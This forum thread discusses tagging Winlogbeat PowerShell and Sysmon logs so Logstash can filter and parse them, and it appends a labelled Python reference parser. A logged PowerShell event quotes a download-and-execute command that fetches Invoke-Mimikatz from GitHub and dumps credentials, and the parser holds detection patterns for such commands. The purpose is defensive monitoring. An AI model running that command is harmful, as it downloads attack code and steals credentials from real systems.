Tagging event logs in Winlogbeat in order to filter in Logstash

Hello, what would the solution be in winlogbeat.yml to this example from Filebeat below?

I want to do special filtering on PowerShell logs and thus tag them, or similar, once they get to Logstash.

Here is my config from winlogbeat.yml:

winlogbeat.event_logs:
  - name: "Microsoft-Windows-Sysmon/Operational"
    fields: {log_type: sysmon}
  - name: "Windows Powershell"
    ignore_older: 96h
    fields: {log_type: Powershell}

Here's an example Logstash config based on the Filebeat config you gave:

Filebeat:

filebeat:
  prospectors:
    - paths:
        - /path/to/logs/access.log
      fields: {log_type: access}
    - paths:
        - /path/to/other/logs/errors.log
      fields: {log_type: errors}

Logstash:

input {
  beats {
    port => 5044
  }
}

filter {
  if [fields][log_type] == "access" {
    mutate {
      add_field => { "foo" => "var" }
    }
  }
}

output {
  stdout { codec => rubydebug{} }
}

Adding fields in Winlogbeat is very similar to Filebeat. See the documentation.

winlogbeat.event_logs:
  - name: Microsoft-Windows-Sysmon/Operational
    fields:
      log_type: sysmon
  - name: "Windows Powershell"
    fields:
      log_type: Powershell
    ignore_older: 96h

Then in Logstash add conditional logic based on the presence of the fields.

filter {
  if [fields][log_type] == "sysmon" {
    # Do something (Logstash config comments start with '#', not '//')
  } else if [fields][log_type] == "Powershell" {
    # Do something else
  }
}

Thank you, I got it working.

Will I have to define a custom grok pattern to parse this out? Currently I'm using this:

grok {
  match => { "[event_data][param3]" => "CommandLine=%{GREEDYDATA:command_line}" }
}

to get a more readable format,

and I get this:

ParameterBinding(Out-Default): name="InputObject"; value="@{Date=30-08-2017 18:41:03; Log=Powershell; EventID=4104; Message=Suspicious Command Line; Results=Download via Net.WebClient DownloadString Command referencing Mimikatz PowerSploit Invoke-Mimikatz.ps1 Use of PowerSploit ; Command=IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds; Decoded

I would like to get rid of the initial "ParameterBinding..." and do a split of the data with ";" as the splitter.

Would something like this be the right way to do it?

filter {
  grok {
    patterns_dir => "/etc/logstash/patterns"
    break_on_match => false
    match => [
      "message", "%{PS_NEWCOMMANDSTATE}",
      "message", "%{PS_SEQUENCENUMBER}",
      "message", "%{PS_HOSTNAME}",
      "message", "%{PS_HOSTVERSION}",
      "message", "%{PS_HOSTID}",
      "message", "%{PS_HOSTAPPLICATION}",
      "message", "%{PS_ENGINEVERSION}",
      "message", "%{PS_RUNSPACEID}",
      "message", "%{PS_PIPELINEID}",
      "message", "%{PS_COMMANDNAME}",
      "message", "%{PS_COMMANDTYPE}",
      "message", "%{PS_SCRIPTNAME}",
      "message", "%{PS_COMMANDPATH}",
      "message", "%{PS_COMMANDLINE}"
    ]
  }
}

found here?

Can you share the raw event in JSON format, as produced by Winlogbeat, that you are trying to further process with Logstash? If you enable debug logging for the publish selector, the events will show up in the log file. Then you can copy/paste the event here, and I'll have a better idea whether the grok is right.

To enable debug logging, edit the config file to contain this and restart Winlogbeat:

logging.level: debug
logging.selectors: ["publish"]
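Added example, not code from this thread or from Winlogbeat/Logstash: a small Python reference parser for the ParameterBinding(Out-Default) message quoted above, useful for working out the split rule before encoding it in a Logstash grok/kv filter. It strips the wrapper, splits on "; " only where a new Key= follows (so the ";" that separates statements inside the PowerShell one-liner stays in the Command value), and tags the command on a few indicators. The sample message is constructed from the event quoted in the thread and trimmed to a complete hashtable; the indicator names and the function names are this example's own.

```python
import json
import re
from typing import Dict, List

# Wrapper that PowerShell pipeline-execution logging puts around the object
# handed to Out-Default. Everything between @{ and the closing } is a
# "Key=Value; Key=Value" rendering of a hashtable.
INPUT_OBJECT_RE = re.compile(
    r'^ParameterBinding\([^)]*\): name="InputObject"; value="@\{(?P<body>.*)\}"$',
    re.S,
)

# Split on ";" only where a new Key= follows. A plain split on ";" would also
# cut the Command value in half, because PowerShell one-liners use ";" as a
# statement separator.
PAIR_SPLIT_RE = re.compile(r"\s*;\s+(?=[A-Za-z_]\w*=)")

# Indicators to tag on; the tag names are this example's own choice.
INDICATORS = {
    "ps_download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I
    ),
    "ps_invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "ps_credential_dumping": re.compile(r"Invoke-Mimikatz|-DumpCreds|sekurlsa", re.I),
}

# Constructed sample, trimmed from the event quoted in the thread above; the
# Command value deliberately contains a ";" that must survive the split.
SAMPLE_MESSAGE = (
    'ParameterBinding(Out-Default): name="InputObject"; value="@{'
    "Date=30-08-2017 18:41:03; Log=Powershell; EventID=4104; "
    "Message=Suspicious Command Line; "
    "Results=Download via Net.WebClient DownloadString Command referencing Mimikatz "
    "PowerSploit Invoke-Mimikatz.ps1 Use of PowerSploit ; "
    "Command=IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); "
    'Invoke-Mimikatz -DumpCreds}"'
)


def parse_input_object(message: str) -> Dict[str, str]:
    """Return the Key=Value pairs of a ParameterBinding(Out-Default) message."""
    match = INPUT_OBJECT_RE.match(message)
    if not match:
        raise ValueError("not a ParameterBinding InputObject message")
    fields: Dict[str, str] = {}
    for pair in PAIR_SPLIT_RE.split(match.group("body")):
        key, sep, value = pair.partition("=")
        if sep:  # every fragment should carry '=' after the lookahead split
            fields[key.strip()] = value.strip()
    return fields


def tag_command(command: str) -> List[str]:
    """Return the indicator tags whose pattern matches the command line."""
    return [tag for tag, rx in INDICATORS.items() if rx.search(command)]


def process(message: str) -> Dict[str, object]:
    """Parse one message and attach tags, mirroring a grok+kv+mutate chain."""
    fields = parse_input_object(message)
    return {"ps": fields, "tags": tag_command(fields.get("Command", ""))}


if __name__ == "__main__":
    print(json.dumps(process(SAMPLE_MESSAGE), indent=2))
```

The same two steps map onto Logstash: a grok pattern that captures the body between `@{` and `}`, then a kv filter. Because a literal ";" splitter would cut the Command in half, the kv filter needs a regular-expression splitter (the kv plugin's field_split_pattern option, where your plugin version supports it) using the same lookahead, or the split has to be done in a ruby filter.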

Hi, I found a solution to this with the "HELK" SIEM project that's on GitHub. Thanks for taking the time to look at my questions.
